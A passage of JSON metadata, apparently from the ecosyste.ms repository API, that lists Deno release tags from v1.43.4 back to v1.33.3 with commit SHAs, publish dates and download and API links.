dencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"p